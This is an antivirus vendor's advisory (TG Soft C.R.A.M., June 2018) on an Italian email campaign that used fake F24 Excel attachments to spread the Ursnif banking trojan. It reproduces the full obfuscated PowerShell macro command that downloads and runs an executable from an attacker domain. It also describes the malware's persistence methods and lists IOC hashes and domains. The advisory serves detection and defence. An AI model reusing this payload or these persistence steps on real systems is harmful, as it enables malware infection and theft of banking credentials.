27/06/2018
11:15

June 27, 2018 malware campaign via email targeting Italy with fake F24, spreading banking Trojan UrSnif

A malicious email containing an Excel attachment, leading to the download of a new variant of the banker malware UrSnif, has been distributed since June 27, 2018
      
 
 
 

TG Soft's C.R.A.M. (Anti-Malware Research Center) analyzed the email campaign spreading the Ursnif Trojan banker on June 27, 2018.

Cyber-criminals developed "Social engineering" methods for fraudulent mass mailings, to induce the victim to open infected attachments or click on links in the body of the message.
If you received a suspicious email, send it to C.R.A.M. (Anti-Malware Research Center) How to send suspicious emails

                INDEX

 
 

"URSNIF" malware campaign.

Name: Trojan.Win32.Ursnif
Malware Campaign: Banker
VirIT: X97M.Downloader.BM, Trojan.Win32.Downloader.RLJ, Trojan.Win32.Ursnif.HI

Description:
The email campaign started this morning on June 27, 2018

Example of examined email:

Subject: ricevute F24 

Buongiorno,

ti allego f24

Cordiali saluti
 

How it spreads:
The email looks like an F24 form submission with a malicious Excel file attached.
The attachment contains a MACRO that, if started, immediately executes a CMD.exe command that will initiate the download of the malware (Trojan.Win32.Downloader.RLJ) via the Windows Powershell.exe program.
 
 POwerSHeLL  -nolO -exEcu  bypAss  -nONI -nOprOFi - wiNd  HiDDeN    
"$7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','ENVIr','Nt','mE') ; 
do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} =  $7d0mk6::geTFolDeRPAtH(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','CLi')).dOwNloADfILE.inVOKE
(\"http://cloudphotos[.]party/fogliodati\",\"$Des\6576890.exe\")}
while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\6576890.exe

The file is then downloaded to the user's Desktop and executed. Once active, it will copy itself into the %appdata%\Microsoft\Windows\[CARTELLA CASUALE]\
 Folder example: %appdata%\Microsoft\Windows\ucbaigjt\, with filename cvbesvse.exe

The XLS file examined downloads malware from the following site:
  • http://cloudphotos[.]party/fogliodati

File Name: cvbesvse.exe
Size: 192000 byte
MD5: 856A792E418146BBF302A5AC9AB69FB7

The Trojan.Win32.Downloader.RLJ (cvbesvse.exe), after starting and copying itself to the folder indicated above (%appdata%\Microsoft\Windows\ucbaigjt), creates a link to the executable file in
C:\Users\[Utente]\AppData\Roaming\Microsoft\
Windows\Start Menu\Programs\Startup
with the name ucbaigjt.lnk
This will allow the malware to restart every time the user is logged in.
 
In addition, a TASK is created in "C:\Windows\system32\tasks\" with the name "Opera scheduled Autoupdate 355159213" that plans to run the malware every 10 minutes, thus making the Downloader active again in the victim's computer even if it is closed.
 
At this point, the Trojan.Win32.Downloader.RLJ downloads the Ursnif payload from http://cloudmegavideo[.]bid into the user's temporary folder with random name (in this case the file is called "EDCD.tmp.exe") and then runs it.
As soon as Ursnif started, it copies itself to the folder: %appdata%\Microsoft\[CASUAL FOLDER]\ with random filename.
In this case the folder is: %AppData%\Microsoft\Batmredm\ with filename Appxnapi.exe

File Name : Appxnapi.exe
Size: 512512 byte
MD5: 0F499E0BB20EAEE792ED05B85D4A35C7
 
The Trojan.Win32.Ursnif.HI is then put into automatic execution by modifying the following registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[CASUALE] = %AppData%\Microsoft\[CARTELLA CASUALE]\[NOME CASUALE].exe
In the examined case:
[AxInASDS] = %AppData%\Microsoft\Batmredm\Appxnapi.exe
 
The Trojan.Win32.Ursnif is part of the Banker macrofamily, its peculiarities are to steal access passwords to important sites such as can be home banking, e-mail, ftp etc.

IOC:
 
MD5:
8F80EC0EAD35359225A0102D28D851F9
856A792E418146BBF302A5AC9AB69FB7
0F499E0BB20EAEE792ED05B85D4A35C7
9F040EE0B7046F39C8A28459841DB2CC
F180DAE16B25BA8615D7C3BBFDEE1F6D
05BFBE6196B33A28314D87546876F953


URL:
http://cloudphotos[.]party/fogliodati
http://cloudmegavideo[.]bid

URL DGA (non ancora attivi):
http://fogmegavideo[.]win
http://cloudmegatape[.]date
http://cloudmegaaudio[.]faith
http://cloudmegacd[.]loan
http://cloudmegafilm[.]trade
http://hazemegavideo[.]bid
http://smokemegavideo[.]win
http://marmegavideo[.]date
http://skymegavideo[.]faith
http://cloudmegatv[.]loan
http://cloudmegamovie[.]trade
http://plumemegavideo[.]bid
http://showermegavideo[.]win
http://mistmegavideo[.]date
http://dimmegavideo[.]faith
http://cloudmegamusic[.]loan
http://cloudmegaclip[.]trade
http://snowmegavideo[.]bid
http://cloudmegadvd[.]win
http://cloudmegaad[.]date
http://rainmegavideo[.]faith
http://cloudmegabook[.]loan
http://fuelmegavideo[.]trade
http://dustmegavideo[.]bid
http://airmegavideo[.]win
http://windmegavideo[.]date
http://roilmegavideo[.]faith
http://hurtmegavideo[.]loan
http://cloudmegasong[.]trade
http://affectmegavideo[.]bid
http://taintmegavideo[.]win
http://cloudmegaphoto[.]date


 

How to identify a fake email

Experience and common sense are the first weapons to avoid these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of ZIP-formatted attachments and, if possible, DO NOT enable automatic macro execution. It is strongly discouraged to set up automatic execution of macros since simply opening Word and Excel files will see the immediate execution of macros without any prior alert.
In case you have been infected by a Banker, the advice from TG Soft's C.R.A.M., is to take appropriate security precautions even after the remediation of the system(s) involved such as changing the most commonly used passwords on the Web. In case the wokstation involved is used for home-banking transactions, an assessment with your credit institution is also recommended.  .  

How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts

Sending materials to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
  1. Any suspect email can be sent directly by the recipient's e-mail, to the following mail lite@virit.com,choosing as sending mode "Forward as Attachment" and inserting in the subject section "Possible phishing page to verify" rather than "Possible Malware to verify";
  2. Save  the e-mail to be sent to TG Soft's C.R.A.M for analysis as an external file to the e-mail program used. The resulting file must be sent by uploading it from the page Send Suspect Files (http://www.tgsoft.it/italy/file_sospetti.asp). Obviously if you want a feedback on the analysis of the data submitted, you have to indicate an e-mail address and a brief description of the reason for the submission (for example: possiible / probable phishing; possible / probable malware or other).
  We give you these suggestions to help avoiding credential theft, viruses/malware or even worse next-generation Ransomware / Crypto-Malware.
Torna ad inizio pagina
 

Integrate your PC / SERVER protection with Vir.IT eXplorer Lite

If you are not yet using Vir.IT eXplorer PRO, it is advisable to install, Vir.IT eXplorer Lite -FREE Edition-.to supplement the antivirus in use to increase the security of your computers, PC and SERVER indifferently,

Vir.IT eXplorer Lite has the following special features:
  • freely usable in both private and corporate environments with Engine+Signature updates without time limitation;
  • Interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend to use it as a supplement to the AntiVirus already in use as it does not conflict or slow down the system but allows to significantly increase security in terms of identification and remediation of infected files;
  • It identifies and, in many cases, even removes most of the viruses/malware actually circulating or, alternatively, allows them to be sent to the  C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.It eXplorer PRO;
  • through Intrusion Detection technology, also made available in the Lite version of Vir.IT eXplorer, the software is able to report any new-generation viruses/malware that have set in automatically and proceed to send the reported files to TG Soft's C.R.A.M.
  • Proceed to  download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.

For Vir.IT eXplorer PRO users...

For Vir.IT eXplorer PRO owners, it is also possible to contact for free TG Soft's technical phone support.The details can be found on the support page  CLIENTS.
 


C.R.A.M.
TG Soft's Anti-Malware Research Center

Back to top of page

 
Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: